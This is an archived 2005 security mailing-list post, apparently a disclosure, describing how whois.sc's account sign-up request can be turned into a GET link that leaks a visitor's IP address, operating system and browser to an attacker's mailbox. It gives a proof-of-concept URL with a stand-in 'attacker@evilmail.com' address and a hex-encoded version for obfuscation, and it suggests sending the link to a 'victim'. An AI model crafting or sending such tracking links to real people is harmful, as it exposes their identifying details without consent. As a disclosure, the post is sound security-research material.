[<prev] [next>] [day] [month] [year] [list]
Message-ID: <b7a807650511020853w7f9e1848g8de46f1a9159770a@mail.gmail.com>
Date: Wed Nov 2 20:01:21 2005
From: unknown.pentester at gmail.com (unknown unknown)
Subject: whois.sc not-big-deal hole
Title: whois.sc not-big-deal hole
Server-side risk: none
Client-side risk: low risk (private info revealed about the user)
Description:
This might not even be considered a proper security hole, but I
thought it's an interesting way to get the following information about
a user:
- IP Address
- Operating system
- Web browser version
This information can be easily obtained by "tricking" someone to visit
your website and then checking the webserver logs. Email headers also
help, not to mention loud OS detection tools such as xprobe2 and nmap
(which will only work if you're lucky and the "victim" doesn't use a
firewall blocking all incoming traffic).
In this case however, the scenario is a little different because we
use a sign-up service provided by an existing website for our own
purposes (enumeration).
The only limitation of this "trick" is that the attacker needs to use
a different email address for each attack. This is because whois.sc
will set the account activation status to "pending" after requesting
the account activation with your email address for the first time.
The original request to sign-up for an account is a POST request
*similar* to the following:
POST http://www.whois.sc/members/process.html HTTP/1.1
Host: www.whois.sc
Content-Length: 48
action=newaccount&doneurl=&email=test%40test.com
However we can change the request from POST to GET and the application
will happily process the query:
http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=test%40test.com
PoC:
http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.com
Replace "attacker%40evilmail.com" in the previous link with your own
email address (e.g.: myself%40gmail.com) and send it to the "victim".
Also, we could obsfucate our email address by encoding it to hex:
http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6D
Note: "%40" is "@" in hex. For a good resource to convert strings to
different encodings check out
http://www.thedumbterminal.co.uk/php/stringdecode.php
Regards,
pagvac
Earth, SOLAR SYSTEM
Powered by blists - more mailing lists